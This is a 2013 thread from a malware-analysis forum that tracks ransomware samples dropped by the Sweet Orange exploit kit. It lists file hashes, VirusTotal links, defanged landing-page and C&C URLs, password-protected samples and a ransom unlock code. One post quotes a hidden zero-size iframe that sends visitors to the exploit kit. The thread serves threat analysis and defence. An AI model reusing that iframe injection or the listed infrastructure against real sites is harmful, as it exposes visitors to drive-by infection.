A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18668  by EP_X0FF
 Sat Mar 23, 2013 2:47 pm
I think it bugged, as it impossible to enter correct deactivation code.

Image

As for me, new appearance looks much better. Asks for ~65$ hm, inflation, I remember they started from ~15$ in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/
Attachments
pass: malware
(144.61 KiB) Downloaded 85 times
 #19120  by EP_X0FF
 Tue Apr 30, 2013 12:25 pm
Dropper, payload of Sweet Orange EK.

Iframe to EK.
Code: Select all
<iframe src="hxxp://df.pizdafyqib.ru/administrator/weather.php?browse=151 width="0" height="0" frameborder="0"></iframe>
SHA256: 11761b0b7d20efe6815f900cf8a0242dae9dec29ee0e309fd1b288e7b9b1c0ef
SHA1: 75dcb3332f21aa31bac16429290e7f6285184824
MD5: a73f6edd6f698edd692fbfe86855f6a4

https://www.virustotal.com/en/file/1176 ... /analysis/

EXE + Jar (CVE-2012-1723) in attach. Keep your Java up to date, or better get rid of it once and for all.
Attachments
pass: infected
(126.06 KiB) Downloaded 61 times
 #19122  by Xylitol
 Tue Apr 30, 2013 1:09 pm
EP_X0FF wrote:Keep your Java up to date
urlquery got winlocked when i submitted the site http://urlquery.net/report.php?id=2243853
Code: Select all
urlQuery Alerts	 No alerts detected
even not detected as sweet orange :)
C&C:
Code: Select all
hxxp://df.pizdafyqib.ru:8581/aw/index.php?m=stats
• dns: 1 ›› ip: 216.246.54.231 - adresse: DF.PIZDAFYQIB.RU
• dns: 1 ›› ip: 216.246.54.231 - adresse: B2B-VM6.VERTICALCOMMUNICATION.IN
 #19130  by mrbelyash
 Wed May 01, 2013 8:17 am
EP_X0FF wrote:I think it bugged, as it impossible to enter correct deactivation code.

Image

As for me, new appearance looks much better. Asks for ~65$ hm, inflation, I remember they started from ~15$ in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/
unlock code 121255545

http://stop-winlock.ru/2013/05/01/troja ... 15437.html
 #19166  by Xylitol
 Thu May 02, 2013 7:21 pm
EP_X0FF wrote:
Code: Select all
hxxp://wsd.nuwazy.ru/sites/oplata/codestariff/themes.php?strategy=154
Code: Select all
• dns: 1 ›› ip: 64.202.124.84 - adresse: WSD.NUWAZY.RU
hXXp://wsd.nuwazy.ru:8581/aw/
https://www.virustotal.com/ru/file/24f0 ... 367522337/
http://www.threatexpert.com/report.aspx ... c791b71390
Java 6 update 17 is enought to get the sample.
Attachments
infected
(95.98 KiB) Downloaded 84 times
 #19180  by EP_X0FF
 Fri May 03, 2013 5:52 pm
Fresh
Code: Select all
hxxp://za.omovigminet.ru/bugs/books/partner/themes.php?strategy=156
SHA256: e1dc306f502657cdc57fc4608aa6b4815747001478bf770afe7ec363fc264a8f
SHA1: 7d12a710f463d79e23ffe4f1bd94942537c3e868
MD5: c2b46eb6e92ebf65e9e8d580f17ecb98

https://www.virustotal.com/en/file/e1dc ... 367603355/
Attachments
pass: infected
(95.06 KiB) Downloaded 73 times
 #19263  by EP_X0FF
 Mon May 13, 2013 1:36 pm
Fresh
Code: Select all
hxxp://rl7bh.ru/guest/recent.php?forums=170
landing
Code: Select all
hxxp://z.ylyzafaq.ru/xx/
SHA256: 0bfbbf1eb94a2fb9004847a0b008c5fc688b0a04665f18dba3ef9a91c1a5dc87
SHA1: 4def049567188969f050893e93a8f61062182473
MD5: eb6f708178d87cec2e2588a379c23285

https://www.virustotal.com/ru/file/0bfb ... 368451928/
Attachments
pass: infected
(98.66 KiB) Downloaded 67 times
 #19625  by Xylitol
 Thu Jun 13, 2013 3:01 pm
Image

PE embed in the string b64^0x7D
Image

Image

Image
Attachments
infected
(115.19 KiB) Downloaded 70 times
infected
(71.46 KiB) Downloaded 69 times
infected
(132.37 KiB) Downloaded 70 times
infected
(84.14 KiB) Downloaded 71 times
  • 1
  • 3
  • 4
  • 5
  • 6
  • 7